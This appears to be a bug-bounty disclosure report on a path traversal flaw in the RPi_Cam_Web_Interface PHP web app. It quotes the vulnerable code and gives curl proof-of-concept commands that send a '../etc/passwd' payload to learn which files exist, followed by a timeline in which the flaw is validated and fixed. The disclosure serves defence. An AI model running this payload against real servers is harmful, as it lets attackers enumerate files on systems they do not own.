Path Traversal in silvanmelchior/RPi_Cam_Web_Interface in silvanmelchior/rpi_cam_web_interface

Valid

Reported on

Feb 18th 2022


Description

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as dot-dot-slash and directory traversal.
https://github.com/silvanmelchior/RPi_Cam_Web_Interface is vulnerable to Path Traversal as shown below:

The vulnerability allows to know which files exists on the filesystem, even outside the webserver directory.

Proof of concept

Vuln variable: $_POST['extrastyle']
Snippet:

   if (isset($_POST['extrastyle'])) {
      if (file_exists('css/' . $_POST['extrastyle'])) {
         $fp = fopen(BASE_DIR . '/css/extrastyle.txt', "w");
         fwrite($fp, $_POST['extrastyle']);
         fclose($fp);

Payload

In a terminal do a request to the vulnerable resource.
In this case, is in the web root directory, and perform the path traversal attack in the extrastyle variable:

curl http://localhost/index.php --data "extrastyle=../../../../../../../../etc/passwd"

If the file exists in the server, the filename will be stored in css/extrastyle.txt.
In a terminal , requests the file and observe /etc/passwd is writen:

curl http://localhost/css/extrastyle.txt

Impact

An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server.
In this case, the path traversal vulnerability allows to enumerate which files exist in the server.

References

https://owasp.org/www-community/attacks/Path_Traversal
https://portswigger.net/web-security/file-path-traversal

We are processing your report and will contact the silvanmelchior/rpi_cam_web_interface team within 24 hours. 3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the silvanmelchior/rpi_cam_web_interface team and are waiting to hear back 3 months ago
silvanmelchior validated this vulnerability 3 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
silvanmelchior confirmed that a fix has been merged on 2c74da 3 months ago
The fix bounty has been dropped
index.php#L209-L213 has been validated
to join this conversation